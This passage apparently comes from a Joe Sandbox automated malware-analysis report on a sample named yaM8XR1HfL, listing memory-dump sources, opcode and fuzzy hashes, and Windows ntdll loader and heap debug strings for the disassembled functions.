                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e596b3ca047d9d1a448d7f3d7e99211486b223dd529c5c78c6d4356637f295c4
                • Instruction ID: c8d403a259f58391e98d1f4358d7ae00909482fb1a260e76d8c181750b1d1bea
                • Opcode Fuzzy Hash: e596b3ca047d9d1a448d7f3d7e99211486b223dd529c5c78c6d4356637f295c4
                • Instruction Fuzzy Hash: 56900225211C1142D60075684C24B17001597E0303F55C116E0154565CCA2589615622

                Control-flow Graph: 16 14c2f90-14c2f9c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 10588005a652c7251cf855370725bfebb70ceb54605dd5460d98a3e042f3fe99
                • Instruction ID: e04a06e9ef851c47ead11e164a3ec85a0561e607c56afcea269e805ba936e15f
                • Opcode Fuzzy Hash: 10588005a652c7251cf855370725bfebb70ceb54605dd5460d98a3e042f3fe99
                • Instruction Fuzzy Hash: 9090023520181502D5007158482471B001597E0302F55C012E1164566DC73589516672

                Control-flow Graph: 17 14c2fb0-14c2fbc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d81e7faa1eddea000cbea397a3879134db3941161fb22c60224102be4e260e3f
                • Instruction ID: ffce4f6f0c9697523d6dc4588f842fce7cf5f2d9511a25de798dc26234436b1d
                • Opcode Fuzzy Hash: d81e7faa1eddea000cbea397a3879134db3941161fb22c60224102be4e260e3f
                • Instruction Fuzzy Hash: CA900225601411424540716888549164015BBF1211755C122E0998561DC66989655766

                Control-flow Graph: 13 14c2e80-14c2e8c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 4136025418af190dbf72178da7f4636bb9e6e4829cbca59ab849beb47b18fe90
                • Instruction ID: a1d0951a014c3e8eda2f24fd0653019078ecbfbf4ca1653bf9e95388d4c7595f
                • Opcode Fuzzy Hash: 4136025418af190dbf72178da7f4636bb9e6e4829cbca59ab849beb47b18fe90
                • Instruction Fuzzy Hash: 5890022560141602D50171584414626001A97E0241F95C023E1024566ECB358A92A232

                Control-flow Graph: 14 14c2ea0-14c2eac LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: da121d8fba8c1a36a406371a8800faa4c398f8316f5ac243cdf14546a347afd8
                • Instruction ID: 91f2eee5b779f75f5bcedb17ea47cfe5b9c4f4a5f8ebf73a5770f328b676a6f7
                • Opcode Fuzzy Hash: da121d8fba8c1a36a406371a8800faa4c398f8316f5ac243cdf14546a347afd8
                • Instruction Fuzzy Hash: 6D90027520141502D54071584414756001597E0301F55C012E5064565EC7698ED56766

                Control-flow Graph: 0 14c2c0a-14c2c0f; 1 14c2c1f-14c2c26 LdrInitializeThunk (0->1); 2 14c2c11-14c2c18 (0->2)
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 73fa2b8c7226a713ae45791338d3eeeb127b7eec6c9ff5f85abc6635c401f1ca
                • Instruction ID: 6df74007a3f7910c7485a222588b7f08c5d05d8e090af3492b803ccc462d6708
                • Opcode Fuzzy Hash: 73fa2b8c7226a713ae45791338d3eeeb127b7eec6c9ff5f85abc6635c401f1ca
                • Instruction Fuzzy Hash: 62B09B759015D5C5DE51E7644608B17791077D0701F15C067D3030653F4778C1D1E276
                Memory Dump Source
                • Source File: 00000004.00000002.2549320260.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_41f000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                • Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
                • Opcode Fuzzy Hash: 7e0fa14252d61827cacaed210b281034bc2fadd4f7a3aae0c4df709769b83de6
                • Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: ec517b12424dfd6416f58e7fdb69e729fc0e067d485b68b138429bdf14ce86df
                • Instruction ID: d4105c68ae8335f5d2525456a45119bf55e1e33fd2266e919186bf13bf160270
                • Opcode Fuzzy Hash: ec517b12424dfd6416f58e7fdb69e729fc0e067d485b68b138429bdf14ce86df
                • Instruction Fuzzy Hash: E792A171604742AFE722CF59C885F6BB7E8BB94754F04481EFA94DB2A0D770E844CB92
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 3446177414-1700792311
                • Opcode ID: 725e609344f987fdad58c8ba33c225ed40ed967d6dbb589e89f01cfed109b1c7
                • Instruction ID: c3b626d654c04ea27e9a857a0dd5f3d532ae1ef79f9979344e1f34c4957396f7
                • Opcode Fuzzy Hash: 725e609344f987fdad58c8ba33c225ed40ed967d6dbb589e89f01cfed109b1c7
                • Instruction Fuzzy Hash: 95D1EC31600386DFDB22DFA9D841AAEBBF1FF99710F19804AF8559F2A2C7349941DB10
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 1bbd63bc5f5a1b78b06471fe9303499337fd69d1cd68f201a72834a63538eec4
                • Instruction ID: 0aca363faf199e33a1e8099ab27f2dfb6e27661ecd00c9613e2075da668d0412
                • Opcode Fuzzy Hash: 1bbd63bc5f5a1b78b06471fe9303499337fd69d1cd68f201a72834a63538eec4
                • Instruction Fuzzy Hash: 55917C70B007129BEB25DF19E885BAB7BA5BB50B24F1A003FD6106F3B1DBB44801D7A1
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: 19b724725796e78a267e6359b32c2b855460c067cd9e0017ddc0232e57002e9c
                • Instruction ID: e286401a655e5a8b8690e6688572b040d1f33a2d478e2286d098ae30a42f2245
                • Opcode Fuzzy Hash: 19b724725796e78a267e6359b32c2b855460c067cd9e0017ddc0232e57002e9c
                • Instruction Fuzzy Hash: 99C188745083828FDB11EF58C144B6EB7E4BF84704F10496BF9959B361E7B8CA4ACB62
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 5b1d070e21b0b8392cd52438122cc6d34069a1f0ae10f822bedff868eabb73b6
                • Instruction ID: 39a49e98a1b530829a4a45c7b04775bfd41e5bb2c4f6982c78ebeb3a1f7cf1c9
                • Opcode Fuzzy Hash: 5b1d070e21b0b8392cd52438122cc6d34069a1f0ae10f822bedff868eabb73b6
                • Instruction Fuzzy Hash: 2DA18D759012299BDF31DF68CC98BEAB7B8EF54710F1101EAE908A7260DB359E85CF50
                Strings
                • @, xrefs: 0153C1F1
                • PreferredUILanguages, xrefs: 0153C212
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0153C1C5
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 7215f5b8a098e5d527fcbdb4808c21586cd50ac9176eda598239d21d515f2f55
                • Instruction ID: 86f3e99dbfc08f06a3baac288135838a37f3df0d5e557b36e6c6c030917c532e
                • Opcode Fuzzy Hash: 7215f5b8a098e5d527fcbdb4808c21586cd50ac9176eda598239d21d515f2f55
                • Instruction Fuzzy Hash: F2416472E00219ABDF11DED9C841FEEBBB8BBA4700F14406BFA49BB250D7749A448B50
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 7aab548a2a71cb42b4fe1e6fb34d12ed5c3bdc38feef35f0522f7181702f8eba
                • Instruction ID: a8ff2ed99a986b94d5ce980458d6b9ca94cedfc41009b7c0d926fd61256645ad
                • Opcode Fuzzy Hash: 7aab548a2a71cb42b4fe1e6fb34d12ed5c3bdc38feef35f0522f7181702f8eba
                • Instruction Fuzzy Hash: AD410032A006598BFB22DBE9C840BADBBB8FF65340F24085ED911EF795D7348942CB51
                Strings
                • LdrpInitializationFailure, xrefs: 015020FA
                • minkernel\ntdll\ldrinit.c, xrefs: 01502104
                • Process initialization failed with status 0x%08lx, xrefs: 015020F3
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: fb9d672a14eb144f01bef7cb666b34f63149cd70a68891951269e26588996b71
                • Instruction ID: 1092e935ceb1d7fe4ef7a802d4b0374efb8626ec7ae9a5070fa06e72aa00e7b6
                • Opcode Fuzzy Hash: fb9d672a14eb144f01bef7cb666b34f63149cd70a68891951269e26588996b71
                • Instruction Fuzzy Hash: 22F0F434640208BBE724E64D9C07F99776CFB80A58F15001EF6007B2D1D2F0A904DA82
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: c4116257dc0d05094888f93d116562cca98ae845acddc820b869c3856421bf7e
                • Instruction ID: be15baa44c6c158de2f5b4150470abe3553588f1bc63151b9d5764c32c54f042
                • Opcode Fuzzy Hash: c4116257dc0d05094888f93d116562cca98ae845acddc820b869c3856421bf7e
                • Instruction Fuzzy Hash: B2714E71A0014A9FDF01DFA9C994FAEBBF8BF58744F15406AE905EB261E634ED01CB60
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 7f484990d05178795cabd4d5da56c3dcdefebfd110821b1153c46f856bfc05a3
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: D7C1EE312443429BEB65CF28C841B6BBBE5BFD4318F084A2DF6968F291D7B4D505CB91
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: 644b08ac520b1e6a2d4669fdfa345d63c2c2549fe90c87b8c1ffdb697bd1cee3
                • Instruction ID: 12831d0eed4ebc79940006ee9fe82f419a7a921668a805bc21fa529680cacbbf
                • Opcode Fuzzy Hash: 644b08ac520b1e6a2d4669fdfa345d63c2c2549fe90c87b8c1ffdb697bd1cee3
                • Instruction Fuzzy Hash: 3E510A72E0061DAFDF11DFA9CC90EEEBBB8FB55754F10052AE511BB290D6709A05CBA0
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 0148A2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 0148A309
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: 0ce7ca3a5a919fe8d22670cd7415b275eaf566705b4bf7a441742c8ef7771996
                • Instruction ID: d1f4ef5f629003b7b8c484d9b4124e5d84f595686fff46f1b33d2e7b6e31f619
                • Opcode Fuzzy Hash: 0ce7ca3a5a919fe8d22670cd7415b275eaf566705b4bf7a441742c8ef7771996
                • Instruction Fuzzy Hash: A3418A30A04659DFEB22DF69C844B6E7BB8BF85700F2440ABE904DB3B1E2B5D941CB50
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 536535da87f905c8d6cb197bdacdde7a518a90bc64c65f5fbf0cdef32063732f
                • Instruction ID: 80ba795657eb7b39d2429292541f3104a1b1d8eabac4727520492051f4d85ebc
                • Opcode Fuzzy Hash: 536535da87f905c8d6cb197bdacdde7a518a90bc64c65f5fbf0cdef32063732f
                • Instruction Fuzzy Hash: 4C22B1726046718BEB25CF2DC09437ABBF1BF46300F188859D9968FAC6E335E452DB64
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: c8c844d7b1ca3a2269df9aa45b208de52c69731c1ea994a56da81b325d526690
                • Instruction ID: 25826743e3b6cfe8c1d4a2ed185e5ab071aca9ce2d236aa48ef07e6405bdbd75
                • Opcode Fuzzy Hash: c8c844d7b1ca3a2269df9aa45b208de52c69731c1ea994a56da81b325d526690
                • Instruction Fuzzy Hash: 48918032900555AEDF229FA5DC55FEFBBB9FF66740F10002AF505AB2A0D774A901CB60
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c7d44a7add2c3f51cd5eb0b3c1aba7b21c2caa779297fff3505dbcad019d030
                • Instruction ID: d3fecdd3bb687890b21da7a6c551d61dd12d28eb28e926d0add1ef4b6429fd25
                • Opcode Fuzzy Hash: 1c7d44a7add2c3f51cd5eb0b3c1aba7b21c2caa779297fff3505dbcad019d030
                • Instruction Fuzzy Hash: EA42E53B6083518BD725CF69C880A6FBBE5BF96300F08492DFA868F290D771D945CB52
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5325a69fa79a40b1af3376e12bcedebd67ccf6e649eebf19ce97a97f3a1a6149
                • Instruction ID: 4e06eb094378ee854764d71f3edba098829c3e34dc3152e4115c1287f71eed4b
                • Opcode Fuzzy Hash: 5325a69fa79a40b1af3376e12bcedebd67ccf6e649eebf19ce97a97f3a1a6149
                • Instruction Fuzzy Hash: 8B428E75E002198FEB25CF69C881BADBBF5BF58300F19809AE948EB255D7349D81CF50
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b225339399ce6e762f7793e593a577b3aff25a8cadd09f67c7a8945ad3dac804
                • Instruction ID: 4afb9e368fc0f4ced682dbc5e1fb52c26f411b5ae1f9db185bfbd59820982aef
                • Opcode Fuzzy Hash: b225339399ce6e762f7793e593a577b3aff25a8cadd09f67c7a8945ad3dac804
                • Instruction Fuzzy Hash: 32D1BE71A002079BDF14DF69C894AFEB7A5FF65204F05862FEA169B2A0E730D951CB60
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: 3b48621c94f3d16a3af225565f41367c60bae1224f84cd5bea1f914a1d3c62f6
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: 0CB13274E00A06AFDF26DBD9C940EAFBBB9BF84304F14445DAA429B7D1DA34E945CB10
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc59c5f106957ceeed644e8486f3c2cab98850f290f465aec2179313db3f4d00
                • Instruction ID: 17175f04a687f2c04af29fc7bfe2bb2b645f2a4f14c728f16110a69a60105346
                • Opcode Fuzzy Hash: dc59c5f106957ceeed644e8486f3c2cab98850f290f465aec2179313db3f4d00
                • Instruction Fuzzy Hash: 81C17774108341CFE760DF19C494BABB7E5BF98704F44492EE989873A1E774E908CBA2
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
